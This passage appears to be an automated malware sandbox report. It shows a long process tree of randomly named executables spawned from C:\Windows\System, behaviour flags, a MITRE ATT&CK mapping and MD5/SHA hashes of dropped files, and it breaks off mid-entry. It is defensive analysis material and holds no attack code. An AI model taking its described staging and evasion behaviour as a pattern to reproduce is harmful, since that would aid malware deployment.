C:\Windows\System\hDaEnuK.exe
2⤵
PID:14248

C:\Windows\System\SglvyNU.exe
C:\Windows\System\SglvyNU.exe
2⤵
PID:14120

C:\Windows\System\iZbrYox.exe
C:\Windows\System\iZbrYox.exe
2⤵
PID:624

C:\Windows\System\nqnTjSS.exe
C:\Windows\System\nqnTjSS.exe
2⤵
PID:6904

C:\Windows\System\XlMdQuZ.exe
C:\Windows\System\XlMdQuZ.exe
2⤵
PID:7528

C:\Windows\System\jHCWFmL.exe
C:\Windows\System\jHCWFmL.exe
2⤵
PID:5452

C:\Windows\System\IYHRzvx.exe
C:\Windows\System\IYHRzvx.exe
2⤵
PID:2704

C:\Windows\System\kechEiN.exe
C:\Windows\System\kechEiN.exe
2⤵
PID:5092

C:\Windows\System\lYGwstZ.exe
C:\Windows\System\lYGwstZ.exe
2⤵
PID:13376

C:\Windows\System\rBgWnIa.exe
C:\Windows\System\rBgWnIa.exe
2⤵
PID:5200

C:\Windows\System\BdROkPk.exe
C:\Windows\System\BdROkPk.exe
2⤵
PID:13348

C:\Windows\System\eqPeuXH.exe
C:\Windows\System\eqPeuXH.exe
2⤵
PID:13428

C:\Windows\System\ziacOjC.exe
C:\Windows\System\ziacOjC.exe
2⤵
PID:6504

C:\Windows\System\PFSlVYo.exe
C:\Windows\System\PFSlVYo.exe
2⤵
PID:9716

C:\Windows\System\DIlrbxJ.exe
C:\Windows\System\DIlrbxJ.exe
2⤵
PID:6564

C:\Windows\System\hPlOFcA.exe
C:\Windows\System\hPlOFcA.exe
2⤵
PID:7896

C:\Windows\System\LoYDvOG.exe
C:\Windows\System\LoYDvOG.exe
2⤵
PID:1820

C:\Windows\System\FGjevKS.exe
C:\Windows\System\FGjevKS.exe
2⤵
PID:10288

C:\Windows\System\YHxrkaX.exe
C:\Windows\System\YHxrkaX.exe
2⤵
PID:10348

C:\Windows\System\IsRzGCL.exe
C:\Windows\System\IsRzGCL.exe
2⤵
PID:7284

C:\Windows\System\tHauAIO.exe
C:\Windows\System\tHauAIO.exe
2⤵
PID:7560

C:\Windows\System\ZAUwbrs.exe
C:\Windows\System\ZAUwbrs.exe
2⤵
PID:12776

C:\Windows\System\DLNxCDG.exe
C:\Windows\System\DLNxCDG.exe
2⤵
PID:7868

C:\Windows\System\XOCPmOv.exe
C:\Windows\System\XOCPmOv.exe
2⤵
PID:8028

C:\Windows\System\FtaYYIr.exe
C:\Windows\System\FtaYYIr.exe
2⤵
PID:10532

C:\Windows\System\QhEmljQ.exe
C:\Windows\System\QhEmljQ.exe
2⤵
PID:8224

C:\Windows\System\baaZoxb.exe
C:\Windows\System\baaZoxb.exe
2⤵
PID:12324

C:\Windows\System\fRtTeTf.exe
C:\Windows\System\fRtTeTf.exe
2⤵
PID:13424

C:\Windows\System\rikMKEb.exe
C:\Windows\System\rikMKEb.exe
2⤵
PID:10780

C:\Windows\System\helSQFj.exe
C:\Windows\System\helSQFj.exe
2⤵
PID:11004

C:\Windows\System\gbJBIAR.exe
C:\Windows\System\gbJBIAR.exe
2⤵
PID:10356

C:\Windows\System\VzgLbyf.exe
C:\Windows\System\VzgLbyf.exe
2⤵
PID:10740

C:\Windows\System\wtIJYod.exe
C:\Windows\System\wtIJYod.exe
2⤵
PID:11084

C:\Windows\System\czYCdTD.exe
C:\Windows\System\czYCdTD.exe
2⤵
PID:5784

C:\Windows\System\zQaEubo.exe
C:\Windows\System\zQaEubo.exe
2⤵
PID:12800

C:\Windows\System\zvCauNq.exe
C:\Windows\System\zvCauNq.exe
2⤵
PID:5816

C:\Windows\System\WXyGlfI.exe
C:\Windows\System\WXyGlfI.exe
2⤵
PID:13076

C:\Windows\System\PPiTvGZ.exe
C:\Windows\System\PPiTvGZ.exe
2⤵
PID:13160

C:\Windows\System\ZsWxQic.exe
C:\Windows\System\ZsWxQic.exe
2⤵
PID:6780

C:\Windows\System\oErkkrQ.exe
C:\Windows\System\oErkkrQ.exe
2⤵
PID:10912

C:\Windows\System\VIvwaDh.exe
C:\Windows\System\VIvwaDh.exe
2⤵
PID:2784

C:\Windows\System\YxjXuut.exe
C:\Windows\System\YxjXuut.exe
2⤵
PID:6860

C:\Windows\System\VHLjxLy.exe
C:\Windows\System\VHLjxLy.exe
2⤵
PID:4960

C:\Windows\System\EuvbfpJ.exe
C:\Windows\System\EuvbfpJ.exe
2⤵
PID:4304

C:\Windows\System\HnbVOLP.exe
C:\Windows\System\HnbVOLP.exe
2⤵
PID:8316

C:\Windows\System\WUGNupv.exe
C:\Windows\System\WUGNupv.exe
2⤵
PID:6024

C:\Windows\System\WNJwdUM.exe
C:\Windows\System\WNJwdUM.exe
2⤵
PID:11580

C:\Windows\System\sjQmpQd.exe
C:\Windows\System\sjQmpQd.exe
2⤵
PID:6056

C:\Windows\System\jSxZFXp.exe
C:\Windows\System\jSxZFXp.exe
2⤵
PID:9068

C:\Windows\System\PtkwODm.exe
C:\Windows\System\PtkwODm.exe
2⤵
PID:6088

C:\Windows\System\iaHFTEd.exe
C:\Windows\System\iaHFTEd.exe
2⤵
PID:12724

C:\Windows\System\WGLmMrQ.exe
C:\Windows\System\WGLmMrQ.exe
2⤵
PID:9192

C:\Windows\System\lsAVqvG.exe
C:\Windows\System\lsAVqvG.exe
2⤵
PID:7160

C:\Windows\System\KGjFGhC.exe
C:\Windows\System\KGjFGhC.exe
2⤵
PID:8204

C:\Windows\System\tZoxUif.exe
C:\Windows\System\tZoxUif.exe
2⤵
PID:3460

C:\Windows\System\JjCaLUk.exe
C:\Windows\System\JjCaLUk.exe
2⤵
PID:1216

C:\Windows\System\EmfgYZo.exe
C:\Windows\System\EmfgYZo.exe
2⤵
PID:3236

C:\Windows\System\ewHYMmP.exe
C:\Windows\System\ewHYMmP.exe
2⤵
PID:12116

C:\Windows\System\pefyGBl.exe
C:\Windows\System\pefyGBl.exe
2⤵
PID:12340

C:\Windows\System\PGlnENN.exe
C:\Windows\System\PGlnENN.exe
2⤵
PID:208

C:\Windows\System\rAyRWIW.exe
C:\Windows\System\rAyRWIW.exe
2⤵
PID:12528

C:\Windows\System\wtSWloY.exe
C:\Windows\System\wtSWloY.exe
2⤵
PID:12608

C:\Windows\System\CWTTfTI.exe
C:\Windows\System\CWTTfTI.exe
2⤵
PID:13828

C:\Windows\System\ztSHvWP.exe
C:\Windows\System\ztSHvWP.exe
2⤵
PID:1732

C:\Windows\System\QiNIxfb.exe
C:\Windows\System\QiNIxfb.exe
2⤵
PID:4236

C:\Windows\System\MPJcHgE.exe
C:\Windows\System\MPJcHgE.exe
2⤵
PID:7048

C:\Windows\System\EpQsrlu.exe
C:\Windows\System\EpQsrlu.exe
2⤵
PID:11460

C:\Windows\System\XILgUwj.exe
C:\Windows\System\XILgUwj.exe
2⤵
PID:12836

C:\Windows\System\WPgfjDF.exe
C:\Windows\System\WPgfjDF.exe
2⤵
PID:5844

C:\Windows\System\PptUAyU.exe
C:\Windows\System\PptUAyU.exe
2⤵
PID:11752

C:\Windows\System\gsyeXpo.exe
C:\Windows\System\gsyeXpo.exe
2⤵
PID:3368

C:\Windows\System\ORfDBhO.exe
C:\Windows\System\ORfDBhO.exe
2⤵
PID:6040

C:\Windows\System\hrrXzpB.exe
C:\Windows\System\hrrXzpB.exe
2⤵
PID:12404

C:\Windows\System\rbOXxYa.exe
C:\Windows\System\rbOXxYa.exe
2⤵
PID:11504

C:\Windows\System\OwIVRKt.exe
C:\Windows\System\OwIVRKt.exe
2⤵
PID:4020

C:\Windows\System\RIdMamf.exe
C:\Windows\System\RIdMamf.exe
2⤵
PID:12660

C:\Windows\System\fiEVxaW.exe
C:\Windows\System\fiEVxaW.exe
2⤵
PID:6756

C:\Windows\System\SHqCmHQ.exe
C:\Windows\System\SHqCmHQ.exe
2⤵
PID:12832

C:\Windows\System\hrvAQEH.exe
C:\Windows\System\hrvAQEH.exe
2⤵
PID:13736

C:\Windows\System\VOadCfl.exe
C:\Windows\System\VOadCfl.exe
2⤵
PID:5284

C:\Windows\System\iCeToSI.exe
C:\Windows\System\iCeToSI.exe
2⤵
PID:9700

C:\Windows\System\xkrDJQN.exe
C:\Windows\System\xkrDJQN.exe
2⤵
PID:6744

C:\Windows\System\KNUZRiO.exe
C:\Windows\System\KNUZRiO.exe
2⤵
PID:7332

C:\Windows\System\bVPjuyc.exe
C:\Windows\System\bVPjuyc.exe
2⤵
PID:14136

C:\Windows\System\NaBOawz.exe
C:\Windows\System\NaBOawz.exe
2⤵
PID:3244

C:\Windows\System\GOOviYX.exe
C:\Windows\System\GOOviYX.exe
2⤵
PID:13988

C:\Windows\System\DAWMFWG.exe
C:\Windows\System\DAWMFWG.exe
2⤵
PID:13316

C:\Windows\System\MQWQnla.exe
C:\Windows\System\MQWQnla.exe
2⤵
PID:7588

C:\Windows\System\BTlCNfM.exe
C:\Windows\System\BTlCNfM.exe
2⤵
PID:6456

C:\Windows\System\bfPUlDr.exe
C:\Windows\System\bfPUlDr.exe
2⤵
PID:7792

C:\Windows\System\hQduJAC.exe
C:\Windows\System\hQduJAC.exe
2⤵
PID:10164

C:\Windows\System\oQdAbUO.exe
C:\Windows\System\oQdAbUO.exe
2⤵
PID:14176

C:\Windows\System\rLxDAAk.exe
C:\Windows\System\rLxDAAk.exe
2⤵
PID:5704

C:\Windows\System\eyWaaBW.exe
C:\Windows\System\eyWaaBW.exe
2⤵
PID:4452

C:\Windows\System\asVNwFm.exe
C:\Windows\System\asVNwFm.exe
2⤵
PID:7676

C:\Windows\System\BghJUSF.exe
C:\Windows\System\BghJUSF.exe
2⤵
PID:760

C:\Windows\System\dEyTpKH.exe
C:\Windows\System\dEyTpKH.exe
2⤵
PID:8276

C:\Windows\System\QBplReq.exe
C:\Windows\System\QBplReq.exe
2⤵
PID:1264

C:\Windows\System\EQjwllh.exe
C:\Windows\System\EQjwllh.exe
2⤵
PID:11164

C:\Windows\System\roHjxWB.exe
C:\Windows\System\roHjxWB.exe
2⤵
PID:10848

C:\Windows\System\Itafpqt.exe
C:\Windows\System\Itafpqt.exe
2⤵
PID:8912

C:\Windows\System\sHGFgds.exe
C:\Windows\System\sHGFgds.exe
2⤵
PID:8036

C:\Windows\System\vszIycS.exe
C:\Windows\System\vszIycS.exe
2⤵
PID:10352

C:\Windows\System\wCEjbjA.exe
C:\Windows\System\wCEjbjA.exe
2⤵
PID:4564

C:\Windows\System\GepXfOz.exe
C:\Windows\System\GepXfOz.exe
2⤵
PID:13588

C:\Windows\System\gExPBJa.exe
C:\Windows\System\gExPBJa.exe
2⤵
PID:5908

C:\Windows\System\HEcsgMR.exe
C:\Windows\System\HEcsgMR.exe
2⤵
PID:6020

C:\Windows\System\SpVZHFx.exe
C:\Windows\System\SpVZHFx.exe
2⤵
PID:3972

C:\Windows\System\ZeoQcGm.exe
C:\Windows\System\ZeoQcGm.exe
2⤵
PID:11380

C:\Windows\System\bTmMuVn.exe
C:\Windows\System\bTmMuVn.exe
2⤵
PID:6060

C:\Windows\System\suLJuRE.exe
C:\Windows\System\suLJuRE.exe
2⤵
PID:12088

C:\Windows\System\XUxYvNT.exe
C:\Windows\System\XUxYvNT.exe
2⤵
PID:11816

C:\Windows\System\cwCbVEA.exe
C:\Windows\System\cwCbVEA.exe
2⤵
PID:11784

C:\Windows\System\dKaHyCf.exe
C:\Windows\System\dKaHyCf.exe
2⤵
PID:1404

C:\Windows\System\nxKWAtI.exe
C:\Windows\System\nxKWAtI.exe
2⤵
PID:4968

C:\Windows\System\KBzLhuP.exe
C:\Windows\System\KBzLhuP.exe
2⤵
PID:3744

C:\Windows\System\ogDdAJx.exe
C:\Windows\System\ogDdAJx.exe
2⤵
PID:5660

C:\Windows\System\ULCdzgL.exe
C:\Windows\System\ULCdzgL.exe
2⤵
PID:12252

C:\Windows\System\udfixdi.exe
C:\Windows\System\udfixdi.exe
2⤵
PID:4484

C:\Windows\System\rgcdCDO.exe
C:\Windows\System\rgcdCDO.exe
2⤵
PID:11888

C:\Windows\System\oijnLOn.exe
C:\Windows\System\oijnLOn.exe
2⤵
PID:12276

C:\Windows\System\knmCoxc.exe
C:\Windows\System\knmCoxc.exe
2⤵
PID:220

C:\Windows\System\EwrscEK.exe
C:\Windows\System\EwrscEK.exe
2⤵
PID:13220

C:\Windows\System\rCrbFzp.exe
C:\Windows\System\rCrbFzp.exe
2⤵
PID:3108

C:\Windows\System\FNtKfsh.exe
C:\Windows\System\FNtKfsh.exe
2⤵
PID:3508

C:\Windows\System\DNGhGdY.exe
C:\Windows\System\DNGhGdY.exe
2⤵
PID:13708

C:\Windows\System\RsPboLS.exe
C:\Windows\System\RsPboLS.exe
2⤵
PID:14144

C:\Windows\System\jwGksZv.exe
C:\Windows\System\jwGksZv.exe
2⤵
PID:5440

C:\Windows\System\DBjRRWR.exe
C:\Windows\System\DBjRRWR.exe
2⤵
PID:13408

C:\Windows\System\mRslOna.exe
C:\Windows\System\mRslOna.exe
2⤵
PID:6556

C:\Windows\System\vVXbFko.exe
C:\Windows\System\vVXbFko.exe
2⤵
PID:6916

C:\Windows\System\wICztvc.exe
C:\Windows\System\wICztvc.exe
2⤵
PID:5472

C:\Windows\System\oaYMjlT.exe
C:\Windows\System\oaYMjlT.exe
2⤵
PID:10816

C:\Windows\System\VkazHYN.exe
C:\Windows\System\VkazHYN.exe
2⤵
PID:8972

C:\Windows\System\MPtXorN.exe
C:\Windows\System\MPtXorN.exe
2⤵
PID:12756

C:\Windows\System\ATrPrCR.exe
C:\Windows\System\ATrPrCR.exe
2⤵
PID:3016

C:\Windows\System\LsufxHG.exe
C:\Windows\System\LsufxHG.exe
2⤵
PID:8332

C:\Windows\System\iEUcQBc.exe
C:\Windows\System\iEUcQBc.exe
2⤵
PID:8600

C:\Windows\System\UTWuZau.exe
C:\Windows\System\UTWuZau.exe
2⤵
PID:4940

C:\Windows\System\tDuJRvH.exe
C:\Windows\System\tDuJRvH.exe
2⤵
PID:13964

C:\Windows\System\TlveWFk.exe
C:\Windows\System\TlveWFk.exe
2⤵
PID:13812

C:\Windows\System\CvVUCkA.exe
C:\Windows\System\CvVUCkA.exe
2⤵
PID:2984

C:\Windows\System\eBMUCsc.exe
C:\Windows\System\eBMUCsc.exe
2⤵
PID:4656

C:\Windows\System\IVUvVig.exe
C:\Windows\System\IVUvVig.exe
2⤵
PID:3632

C:\Windows\System\dtSUHRz.exe
C:\Windows\System\dtSUHRz.exe
2⤵
PID:6584

C:\Windows\System\IcGIcPp.exe
C:\Windows\System\IcGIcPp.exe
2⤵
PID:5140

C:\Windows\System\qwKBuVk.exe
C:\Windows\System\qwKBuVk.exe
2⤵
PID:13564

C:\Windows\System\DPnhQkt.exe
C:\Windows\System\DPnhQkt.exe
2⤵
PID:14012

C:\Windows\System\kbgSZwL.exe
C:\Windows\System\kbgSZwL.exe
2⤵
PID:4944

C:\Windows\System\NJvAtTj.exe
C:\Windows\System\NJvAtTj.exe
2⤵
PID:14132

C:\Windows\System\XsLioBv.exe
C:\Windows\System\XsLioBv.exe
2⤵
PID:14076

C:\Windows\System\fhNkpIM.exe
C:\Windows\System\fhNkpIM.exe
2⤵
PID:13896

C:\Windows\System\OdleGwF.exe
C:\Windows\System\OdleGwF.exe
2⤵
PID:13484

C:\Windows\System\NHWVtMt.exe
C:\Windows\System\NHWVtMt.exe
2⤵
PID:12396

C:\Windows\System\lcaAhNG.exe
C:\Windows\System\lcaAhNG.exe
2⤵
PID:6896

C:\Windows\System\PYarqPR.exe
C:\Windows\System\PYarqPR.exe
2⤵
PID:6116

C:\Windows\System\OaKarQu.exe
C:\Windows\System\OaKarQu.exe
2⤵
PID:11484

C:\Windows\System\EGJjwoV.exe
C:\Windows\System\EGJjwoV.exe
2⤵
PID:14020

C:\Windows\System\coWMFzo.exe
C:\Windows\System\coWMFzo.exe
2⤵
PID:11328

C:\Windows\System\REhVSIN.exe
C:\Windows\System\REhVSIN.exe
2⤵
PID:13368

C:\Windows\System\PDDXpfR.exe
C:\Windows\System\PDDXpfR.exe
2⤵
PID:14312

C:\Windows\System\saywyWz.exe
C:\Windows\System\saywyWz.exe
2⤵
PID:13536

C:\Windows\System\FEVaOOH.exe
C:\Windows\System\FEVaOOH.exe
2⤵
PID:13920

C:\Windows\System\lSDDwNg.exe
C:\Windows\System\lSDDwNg.exe
2⤵
PID:13664

C:\Windows\System\dWKsleg.exe
C:\Windows\System\dWKsleg.exe
2⤵
PID:8656

C:\Windows\System\qwRycbQ.exe
C:\Windows\System\qwRycbQ.exe
2⤵
PID:8264

C:\Windows\System\gGovquq.exe
C:\Windows\System\gGovquq.exe
2⤵
PID:13928

C:\Windows\System\jfuhksa.exe
C:\Windows\System\jfuhksa.exe
2⤵
PID:9908

C:\Windows\System\UghwLUW.exe
C:\Windows\System\UghwLUW.exe
2⤵
PID:5796

C:\Windows\System\CqXkMAp.exe
C:\Windows\System\CqXkMAp.exe
2⤵
PID:8464

C:\Windows\System\ZKWqRkI.exe
C:\Windows\System\ZKWqRkI.exe
2⤵
PID:1320

C:\Windows\System\kAsUOYp.exe
C:\Windows\System\kAsUOYp.exe
2⤵
PID:2036

C:\Windows\System\KBlPPqz.exe
C:\Windows\System\KBlPPqz.exe
2⤵
PID:6788

C:\Windows\System\ZmviqYc.exe
C:\Windows\System\ZmviqYc.exe
2⤵
PID:13924

C:\Windows\System\gFspRbW.exe
C:\Windows\System\gFspRbW.exe
2⤵
PID:3432

C:\Windows\System\mEDeSTT.exe
C:\Windows\System\mEDeSTT.exe
2⤵
PID:4508

C:\Windows\System\yHRYkNb.exe
C:\Windows\System\yHRYkNb.exe
2⤵
PID:2260

C:\Windows\System\euDSzNv.exe
C:\Windows\System\euDSzNv.exe
2⤵
PID:2156

C:\Windows\System\hITUkmP.exe
C:\Windows\System\hITUkmP.exe
2⤵
PID:12112

C:\Windows\System\flEKRQC.exe
C:\Windows\System\flEKRQC.exe
2⤵
PID:5840

C:\Windows\System\nfLBUjt.exe
C:\Windows\System\nfLBUjt.exe
2⤵
PID:1784

C:\Windows\System\wgcuXbV.exe
C:\Windows\System\wgcuXbV.exe
2⤵
PID:5072

C:\Windows\System\voCODgq.exe
C:\Windows\System\voCODgq.exe
2⤵
PID:5180

C:\Windows\System\EfZfrnL.exe
C:\Windows\System\EfZfrnL.exe
2⤵
PID:376

C:\Windows\System\uqpshaZ.exe
C:\Windows\System\uqpshaZ.exe
2⤵
PID:1128

C:\Windows\System\yVxrZgC.exe
C:\Windows\System\yVxrZgC.exe
2⤵
PID:5780

C:\Windows\System\BBaEVDd.exe
C:\Windows\System\BBaEVDd.exe
2⤵
PID:1908

C:\Windows\System\vGSPvFh.exe
C:\Windows\System\vGSPvFh.exe
2⤵
PID:4800

C:\Windows\System\WWLTJny.exe
C:\Windows\System\WWLTJny.exe
2⤵
PID:14732

C:\Windows\System\ZOaNPQU.exe
C:\Windows\System\ZOaNPQU.exe
2⤵
PID:14836

C:\Windows\System\svdosdf.exe
C:\Windows\System\svdosdf.exe
2⤵
PID:14964

C:\Windows\System\mwwsSwg.exe
C:\Windows\System\mwwsSwg.exe
2⤵
PID:14908

C:\Windows\System\vUcoSXu.exe
C:\Windows\System\vUcoSXu.exe
2⤵
PID:15108

C:\Windows\System\uXsHUFP.exe
C:\Windows\System\uXsHUFP.exe
2⤵
PID:15252

C:\Windows\System\HlBUWeK.exe
C:\Windows\System\HlBUWeK.exe
2⤵
PID:15312

C:\Windows\System\UVLYAnc.exe
C:\Windows\System\UVLYAnc.exe
2⤵
PID:14360

C:\Windows\System\rBUPqZW.exe
C:\Windows\System\rBUPqZW.exe
2⤵
PID:15292

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:13984

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2580

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wgf0pb0v.fjz.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\System\BMThVzW.exe
Filesize
2.9MB

MD5
5b30e6e42717215e413d6c70dbdabc69

SHA1
dbab1c96411b88fc2df63b803166fff4b884ce4c

SHA256
a3f225f9532bf31501cbb3f3bc9da78ce808b3fcd3131269db39adb8d7d40bbb

SHA512
8e280ee8e70e90a4b9248e0144830840daaee643edc8f5f82cca77dba6038ee75925dc26208a5cb2df5a0a43ab3837db51d2008b860a8a179bc00e81e0604357

Download Submit
C:\Windows\System\BMcJkPi.exe
Filesize
2.9MB

MD5
7337ff4695240746cb69ddc387460285

SHA1
5707fad484e89529a7ff09fe576f4010672f604d

SHA256
68f3998b0e7c64f4c72a4f9f7b65cbb66aaaf8d9a88e752f63f84ff22fb045a2

SHA512
0c770407825f97cc9ece3b148f9243e7c22bbf2549048d704a638f229232f59ea56c4f7f34a89050f5394d5ef917b96eb1198166b3e772f962c8092e62d26e11

Download Submit
C:\Windows\System\BbcnLVg.exe
Filesize
2.9MB

MD5
0637ab20f93152ba6fca8f5f94552b33

SHA1
65e95028125640acbd1864df12a2b9f15d3d446f

SHA256
8e05470e0edc0c02817ab8b791d9b75d4c507a9e0b469cc64b5ccfee97ddd997

SHA512
96bc522b07c0140d764604faee9d9c0889707e7e68a52e36a8dcf20a208559a6b668107346f2d1f1578180db348517046f32f81084284d930cbd249acec39560

Download Submit
C:\Windows\System\CNFXofQ.exe
Filesize
2.9MB

MD5
ef17e4e2ac2f07f83d9d0da1d1d1aaad

SHA1
da6c8720da05c70f054cdc84602d93bc188c47f3

SHA256
6aa7bbd0e8fc2a47d174661bae4eac8c29ececae09400f6fdb3bb62021cf0378

SHA512
93dd96cf65488fb941ce4226115137d7734b090210fc7a18f107be75d3de267cec4bb5b9129dd83d86c9d9a701e1734f961c67bdff732f073a9f618bfe5d53d9

Download Submit
C:\Windows\System\CTJhcbE.exe
Filesize
2.9MB

MD5
edc63b4132426168fe1541bdc9178be0

SHA1
f2765beda50538cf8f38f27be1e0713bf09653dd

SHA256
9d7a86cfe43e2dca259c14dfe0fb5c56f61d419e050db3a37a230c99cee29844

SHA512
d90886ffdb38a284d9c683590f31e5028385de7dba0689df3a776effd3e63599819064ae46d35336394f9feabddbd7d841184a486ccd2bb6509d0916ba2383f2

Download Submit
C:\Windows\System\CdrXBrO.exe
Filesize
2.9MB

MD5
df85196f2920d5ba2ad1a8d6fd7d3653

SHA1
f198a1c9685707daa5abef005463bd1dbb54882d

SHA256
a0950ce60a0fc9e8034ed748235b21d900d9f560ac519b06988fa72eed34ae8b

SHA512
e2f9bb60df85c4757b9bf1339a12e185774e86b600bada3dd04f629be2aae95d3bb7ada5488bbbf05297b71a6f74a5dbc1f8e27787d1f33ff5f222a8e49becdb

Download Submit
C:\Windows\System\CzyeYXe.exe
Filesize
2.9MB

MD5
7884ff39ee3bbbffb669091d0541e152

SHA1
9897afc441c9f050a49fbd319f845dc651927f53

SHA256
a4f7d8e6b6fa716ce3e182fecc1830bb413520cb68764751558ba62852cd7ed9

SHA512
97e63ffd7bdbf2cdcfaaa01db63a88ed9b5d4cf65c60171e75720b5d1e87661dc6a7af25dfabd1972c0ba5fb758a020107a00a580666c1e877d0a945ffe72dfd

Download Submit
C:\Windows\System\DVqRczz.exe
Filesize
2.9MB

MD5
4dcf49dee506ea9fe820e52d7edb9f02

SHA1
74395f9c73871eac0340b763dd7c214bd6ec661e

SHA256
420d5b3fe3919a5d2db5ee8bcdeeee481bcd7a660b4e49da4e1453482d05e802

SHA512
95ed7d1e5f369e738bb00e2a27c5209aad082744a96a1c28fdef625110b16b8c4173cbd6db443ad04d1de19f2705af14437066c7a24b222a428549e9579b963f

Download Submit
C:\Windows\System\ENONZnc.exe
Filesize
2.9MB

MD5
8aaed58bd53f846f3d802668fd6ee8e3

SHA1
64b693a5845bee72128bf12825e2293314bc7bde

SHA256
ce660ced1f15d4c1afe2a6a1790e2ff844c29212679241696f1cf5db90a1f289

SHA512
205de8f49fe3e41d2c2f5d1b5a3b6090d44f8c44f84687b3f1d5c83181368142ae47ab047eee56bbaed709856383a3e88b70d4df9076e2cec9a684469dffe6cd

Download Submit
C:\Windows\System\GWHqASl.exe
Filesize
2.9MB

MD5
27ee75c6194a38886245d01f9628d4fe

SHA1
69b69f8a761b547c12d84f131b4fe716581740ed

SHA256
124cb05d9de4df3ba73dfe65ce999e453a19e343e17a150e3fac11d888aba697

SHA512
ba2384184bc09d781fcba7970cb42cbcad16182a6caf82ff62c1071e3877743ded4daa37036f99955071fc3f2e5cb88680005d2cdc2e91abc91eb85430d99ed3

Download Submit
C:\Windows\System\GoaDlhA.exe
Filesize
2.9MB

MD5
9869b98ea8b7452a102c805a3ef68d18

SHA1
185fb9953e0ee6ceda0fe72522bcacf9a1a4ddc8

SHA256
ef04071a4417a4577c9c9bbc29752ca653838647c1439c2a1c6f00c0c9b38000

SHA512
08a2e71ee68014bcc9cf9ce7f699575b41a0ef6e53d3d808204000346b63482946431584214a6635b9bf189ad35460779130e8829ab31a38e391703bfd0f5e9e

Download Submit
C:\Windows\System\HRrIVrF.exe
Filesize
2.9MB

MD5
aead373013d0dd4bc80dc246185d537e

SHA1
8e98d33d5e7f0c642806138ef719415848adbcf1

SHA256
a7e4a484160de67cc08b2ba8bd968c0db13605b52e1e16fe3435336313c9036d

SHA512
0c1506e2799b5338c186ae509d079db3c2c5e747623f4682dc26b55dd9c0742814f45ad30b0e20ffaa3d37333ad0161c86a964747c90d8e32e2c17968dc24596

Download Submit
C:\Windows\System\MdcVemS.exe
Filesize
2.9MB

MD5
cce51d0088bf83392d11acacf6eb6d8b

SHA1
5fb31e5eda9d7d480120ae362a19d1bff5538882

SHA256
7016b5946ff91fa8f8750104ae9d330ede3fe64fb198b109b0b49f49399968ad

SHA512
e4e6cf430497b321d2019cf2a4726a6cc27c63d490035d06b9f6e0498f97999d5120de153aaa53176b0edc1f4db903449e67771029197fe9bbfd1b197c0d5c9b

Download Submit
C:\Windows\System\NpEauha.exe
Filesize
2.9MB

MD5
e61c24cea820dee2cd675b254da1d540

SHA1
8ad78b91d1e7d1948560a34c4fc747ae8a107c6f

SHA256
02b997e73fa0d4656565b3aa57faab531f54b9c73bc9daf482611aadf5e7ea1e

SHA512
f4ea443677b3c8c441a7e25d72f2f68cc0efa868f42f6322fbf24b7f943b7e9f226a7919246ea84584673721b15e92c4a43115806bb0744a61944974b144f394

Download Submit
C:\Windows\System\NscDEfG.exe
Filesize
2.9MB

MD5
cee9d3be41cfc9f344c1fcdea42f3007

SHA1
ef3b7637af9e5c355bb9cbf6b7a0acbc711fa878

SHA256
85479438b54a2d22b4119ff47aae7bd6679984aa448b022a7d99f8473da53530

SHA512
60bace60dddaefcbeab6888bbbd07276e983d717cc891544ef415f8f0eab442957af824756bbb84b949c125496991c883e2de3025b624355fec8547a57fbe146

Download Submit
C:\Windows\System\OCEyheA.exe
Filesize
2.9MB

MD5
9185c6b5de0564a6f935e120abea4d5a

SHA1
d2a5131f618d92f662cfb4c444abf730555762cc

SHA256
ab3269faa513220e8227074ca2e5f130fcacd3f308d015b3618fa1473f47cc83

SHA512
ebe104833a9257fe6041f18ca23521d41bbe618dd2bbedf502b5b26b8b1b17cdb55ecf3e430b463eff3c07e680bdee9342170f624ea8953940a67683cdbff1e5

Download Submit
C:\Windows\System\XIEXRcv.exe
Filesize
2.9MB

MD5
44287c82429398681da7f05453f9c0dc

SHA1
90bcec6fdfb920b23597edea8d51ba64f58c2bdf

SHA256
aff34ad7ae0ddde7bd0d9b2ea0b5c103683259943fd03f393b53cede7c1f98ec

SHA512
72bd543bd28b08037a74a1e969894bd85c347ce05ba289619aa4ceaf75b72ec8270a8ae83a9de318db930e4e6f4610c2892e441a64684b572a2a0a6a86decb91

Download Submit
C:\Windows\System\YPgUwiJ.exe
Filesize
2.9MB

MD5
d37e8675f09ea51b5d522191574aab24

SHA1
4c1e8880675d9dc644e22fe664ffe355d9992066

SHA256
8109a2cfdd2812b94e61bdf2eb6adcb9d0f627e8fda802c30c83b367d6c48d4a

SHA512
dfa15afd11e603400405098817e118d11401af9215d21f70bbe59650e2a7c0850886730fb6e308a4147e6ec958be2689e55c6fe79e8c9947ad50fbec8e6b14a7

Download Submit
C:\Windows\System\YWnvHnY.exe
Filesize
2.9MB

MD5
6a66d362e1f2300334f584cda716774d

SHA1
1364576cc233ef24fa75313280737b2c2a8c7408

SHA256
c3bdbb3c8fcbf9a88844d686acc2321f2df97b1ccd235e323cac68c93fde053c

SHA512
e3c316810b98ae1fc4b8ca16581a923d54f117e77d312f20e2cea5bc0f0a1fc26104c9843e5ab3c2bd29479ced5f500a485d6580f1ba6bfcc5593937e75e5380

Download Submit
C:\Windows\System\auyJVva.exe
Filesize
2.9MB

MD5
ec3c20de4b5be2946e25a97f71562489

SHA1
